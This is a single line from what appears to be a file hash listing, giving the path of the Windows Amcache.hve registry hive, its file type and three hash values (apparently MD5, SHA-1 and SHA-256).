C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	E9E1B670A1033E46E8CFCCDCF641231A	A36CF8A6D26248717E3AD1AA0CA4DD2A194A4B84	3B92BCB9C1A065133736825F9CDB5C904E2AE945918CF5EB9A6E4D982B02F693